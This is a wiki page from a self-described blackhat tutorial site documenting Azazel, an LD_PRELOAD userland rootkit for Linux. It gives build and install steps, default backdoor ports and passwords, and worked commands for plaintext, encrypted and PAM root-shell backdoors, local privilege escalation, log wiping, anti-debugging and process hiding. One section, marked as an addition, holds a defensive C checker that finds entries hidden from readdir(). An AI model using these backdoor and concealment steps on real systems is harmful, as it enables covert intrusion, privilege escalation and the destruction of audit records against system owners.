
Azazel
From Security 101: Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools
Azazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from the Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.
Contents
1 Disclaimer
2 Features
3 Latest Source
4 Hooking Methods
5 Configuration
6 Backdoor Examples
6.1 Plaintext backdoor
6.2 Crypthook backdoor
6.3 PAM backdoor
7 Log Clearing
8 Anti Debugging
9 Process Hiding
10 Preliminary ldd/unhide obfuscation
11 Removal
12 Related
Disclaimer
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you.
Features
Anti-debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells:
  Crypthook encrypted accept() backdoor
  Plaintext accept() backdoor
PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings
Latest Source
Clone the sources
Terminal
localhost:~$ git clone https://github.com/chokepoint/azazel.git
Build the rootkit
Terminal
localhost:~$ make
Running "make install" will inject the live kit into your system. While removal is not impossible, it's an unnecessary and painful procedure, not to mention you may forget to remove it.
Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as libselinux.so into /lib. An entry is then added to /etc/ld.so.preload in order to hook system-wide dynamically compiled programs.
Example runtime hooking of bash.
Terminal
localhost:~$ LD_PRELOAD=/lib/libselinux.so bash -l
Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list. This allows all of the required functions to be linked upon initiation of the library. Syscall function names are XORed by config.py and written to const.h. Original libc functions can be accessed by using the preprocessor definitions also in const.h. Each definition has a prefix of SYS_ followed by the name of the function in caps. For example, to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func().
typedef struct struct_syscalls {
    char syscall_name[51];     /* libc function name, stored XOR-obfuscated in const.h */
    void *(*syscall_func)();   /* resolved pointer to the original libc implementation */
} s_syscalls;
Configuration
All variables that require changing prior to deployment are located near the top of config.py. Variable data is ciphered using an XOR key in order to not expose them to dumping programs like "strings." See below for a list of variables and their associated purpose.
The rootkit will hide all TCP/IP connections within these HIGH and LOW port ranges. These ranges are used to not only hide from netstat/lsof, but also to hide from sniffing using libpcap.

Variable(s)            | Description                                                                               | Default
LOW_PORT / HIGH_PORT   | Ports used to trigger full PTY plaintext backdoor.                                        | 61040 / 61050
CRYPT_LOW / CRYPT_HIGH | Ports used to trigger full PTY crypthook backdoor.                                        | 61051 / 61060
PAM_PORT               | Also hides this port but doesn't trigger accept backdoor.                                 | 61061
SHELL_MSG              | Display this string to users once they get a shell.                                       | Welcome
SHELL_PASSWD           | Shell password for both plaintext and crypthook backdoors.                                | changeme
SHELL_TYPE             | Use this shell for accept() backdoors.                                                    | /bin/bash
MAGIC_STRING           | Hide any files with this string in the filename.                                          | __
BLIND_LOGIN            | Fake user account used to activate the PAM backdoor.                                      | rootme
ANTI_DEBUG_MSG         | Display this message to the sysadmin if they try to ptrace.                               | Don't scratch the walls.
CLEANUP_LOGS           | If this environment var is set to a valid pts, then clean up utmp/wtmp logs for that pts. | CLEANUP_LOGS

The following variables are specifically included for the crypthook backdoor.

Variable(s) | Description                                             | Default
PASSPHRASE  | This key is used for encryption/decryption of sessions. | HelloNSA
KEY_SALT    | Key salt used for key derivation.                       | changeme
Backdoor Examples
For each of these examples we are assuming that sshd is hooked with azazel and able to trigger any of the three operational backdoors.
Plaintext backdoor
We need to set the local port to something within the ranges of LOW_PORT and HIGH_PORT as configured above. This not only ensures that the connection will be hidden from local sniffing and detection, but it also triggers a full PTY interactive shell upon entering the correct password. The local port can be set using ncat's -p option. Upon successfully connecting to the remote daemon, the first line you enter should be the SHELL_PASSWD that you created.
$ ncat target 22 -p 61040
changeme
Welcome!
Here's a shell.
root@host:/root #
Crypthook backdoor
Triggering the Crypthook backdoor is similar to the plaintext backdoor, but we need to speak the same protocol. Crypthook is an AES encryption wrapper for TCP/UDP connections and can be downloaded from the CryptHook page linked under Related. Crypthook relies on preload hooking as well, and can be used with netcat by utilizing the LD_PRELOAD environment variable.
$ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051
changeme
Welcome!
Here's a shell.
root@host:/root/ #
PAM backdoor
The PAM hooks work by waiting for the specified fake user to attempt a connection. The hooks return the pw entry for root and accept any password to establish a successful login. Since this method would generally be used with sshd, the connection will not be hidden unless you can force the ssh client to bind to a local port within one of the port ranges. Another client shared library has been included to force a program to bind to a port that we'd like to hide.
$ make client
$ LD_PRELOAD=./client.so ssh rootme@localhost
root@host:/ #
The PAM hooks can also be used for local privesc.
$ su - rootme
#
Log Clearing
Log clearing can be accomplished by setting the CLEANUP_LOGS environment variable to the tty/pts device that you want to remove from the records and then executing a command. When accessing the target system using either of the accept backdoors, the given pseudoterminal is automatically removed from both utmp and wtmp log files. However, if you need to use the PAM backdoor through SSH, you will need to manually remove your pts from the logs as demonstrated below.
$ w | grep pts/16
root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
Anti Debugging
Azazel hooks ptrace() and returns 1, hence denying any debugging from occurring. The message displayed to the sysadmin is really more of a joke than anything and will definitely set off alarms that something is wrong.
$ strace -p $PPID
Don't scratch the walls
This works on any userland debugger (ltrace, strace, gdb, ftrace). This hook could be easily extended to hide specific information should you desire to do so.
Process Hiding
Jynx/Jynx2 relied on a specified GID in order to hide processes and files. There are some obvious problems with using this method, so Azazel addresses this by again using environment variables to mask any processes that may give away our presence. The variable can also be configured inside of config.py, but defaults to HIDE_THIS_SHELL.
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
When this environment variable is set, the process is able to see files and processes hidden by the rootkit. This is important for the PAM hook. Because PAM invokes bash on its own, you have to use this environment variable to access hidden files.
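A defender-side check for the readdir()-level hiding that Hooking Methods, the MAGIC_STRING setting and this section describe, added here as an example and not code from Azazel or the original page: it lists a directory once through the raw getdents64 syscall and once through libc's readdir(), and reports every entry that only the kernel view shows. The names raw_dirent64, raw_list, libc_sees and count_hidden_entries are this example's own; it assumes Linux with glibc or musl.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Kernel record layout returned by getdents64; declared here so no libc header is needed. */
struct raw_dirent64 { unsigned long long d_ino; long long d_off; unsigned short d_reclen; unsigned char d_type; char d_name[]; };
/* Ask the kernel directly: list `path` with the raw getdents64 syscall, bypassing the
 * opendir()/readdir() that a preloaded library can interpose. Returns entry count or -1. */
static int raw_list(const char *path, char names[][256], int max) {
    int fd = open(path, O_RDONLY | O_DIRECTORY), n = 0;
    char buf[8192];
    if (fd < 0) return -1;
    for (long got; (got = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0;) {
        for (long off = 0; off < got && n < max; n++) {
            struct raw_dirent64 *d = (struct raw_dirent64 *)(buf + off);
            snprintf(names[n], 256, "%s", d->d_name);
            off += d->d_reclen;
        }
    }
    close(fd);
    return n;
}
/* Return 1 if libc's readdir() view of `path` contains `name`, 0 otherwise. */
static int libc_sees(const char *path, const char *name) {
    DIR *dir = opendir(path);
    struct dirent *e;
    int found = 0;
    if (!dir) return 0;
    while (!found && (e = readdir(dir)) != NULL) found = strcmp(e->d_name, name) == 0;
    closedir(dir);
    return found;
}
/* Count entries the kernel reports but readdir() omits, printing each. A MAGIC_STRING file
 * filter or a /proc PID filter in a preloaded library makes this non-zero; -1 if unreadable. */
int count_hidden_entries(const char *path) {
    static char names[4096][256];
    int n = raw_list(path, names, 4096), hidden = 0;
    if (n < 0) return -1;
    for (int i = 0; i < n; i++)
        if (!libc_sees(path, names[i])) { printf("hidden from readdir(): %s/%s\n", path, names[i]); hidden++; }
    return hidden;
}
/* Stand-alone use: defaults to /proc, where a hidden PID directory means a hidden process. */
int main(int argc, char **argv) { return count_hidden_entries(argc > 1 ? argv[1] : "/proc") != 0; }
```

The comparison still goes through libc's syscall() wrapper, so build the checker statically (gcc -static) when a host is suspected of being hooked: a static binary never consults /etc/ld.so.preload or LD_PRELOAD. On /proc, re-run before acting on a hit, since a process that exits between the two listings shows up once.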
Preliminary ldd/unhide obfuscation
Azazel avoids detection from ldd and unhide by selectively NOT hooking those two programs. Once the programs are done, azazel continues hooking programs as normal. This opens up a window for removing the offending library, but at this point it is better than completely revealing the kit. The next release will include a more advanced anti debug/ldd/unhide obfuscation.
Removal
To remove Azazel, the best course of action is to boot into a live CD, mount your bootable hard drive, and delete the /etc/ld.so.preload file from the partition.
Related
Linux
LD_PRELOAD
C
CryptHook (http://www.chokepoint.net/2013/09/crypthooksecuretcpudpconnection.html)
Jynx
Hooking PAM
Retrieved from "http://www.blackhatlibrary.net/Azazel"
This page was last modified on 14 February 2014, at 02:34.
